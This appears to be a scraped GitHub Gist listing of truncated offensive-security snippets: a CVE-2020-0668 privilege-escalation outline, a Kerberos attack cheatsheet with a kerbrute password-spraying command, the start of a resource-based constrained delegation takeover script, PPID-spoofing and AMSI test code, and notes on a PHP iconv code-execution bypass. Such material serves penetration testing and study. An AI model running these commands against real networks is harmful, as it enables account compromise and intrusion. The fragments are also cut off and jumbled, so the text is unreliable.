The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
snovvcrash snovvcrash
💭
truewilliam
/ CVE-2020-0668 - Windows LPE
Created
February 19, 2020 00:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PowerShell.exe | |
| ProcMon.exe | |
| - Path Includes C:\Exploit | |
| - Process Name: svchost.exe | |
| Add-VpnConnection -Name "hacknroll" -ServerAddress "0.0.0.0" -PassThru | |
| REG QUERY HKLM\SOFTWARE\Microsoft\Tracing |
rasta-mouse
/ PPID Spoof & BlockDLLs
Last active
April 1, 2025 22:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # pip install python-twitter | |
| # pip install colored | |
| # pip install google | |
| import re | |
| import urllib3 | |
| import twitter | |
| import requests |
MSAdministrator
/ iranian_apit_groups_possible_commands.md
Last active
December 6, 2024 08:14
Iranian APT Groups & Possible Commands Used By These Groups
This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Credits: @hugeh0ge
It uses iconv, in php, in order to execute the same payload.
Uses cases :
- You control the first parameter of
iconv(in_charset), you can set an env var and you can upload arbitrary files (.solibrary file and thegconv-modulesfile) and you know their path. - You have a php RCE but
system,shell_exec,curl_execand other functions are disabled but you cansetenv(andLD_PRELOADis blacklisted).
sminez
/ get_ippsec_details.py
Last active
June 5, 2024 12:10
Find examples of pen testing methods and tools in videos by Ippsec (as of 22nd January 2020)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Script used to pull down the current video descriptions from ippsec's youtube channel. | |
| The raw output still has a few HTML tags that need to be manually removed and there | |
| also seem to be multiple duplicates of videos that have been removed in the output | |
| saved as ippsec-details.txt | |
| """ | |
| import re | |
| import sys |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
HarmJ0y
/ rbcd_demo.ps1
Last active
April 23, 2025 13:30
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
rasta-mouse
/ amsi-test-sample
Created
February 21, 2019 18:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import sys | |
| import binascii | |
| import socket | |
| import re | |
| from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES | |
| # get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte) |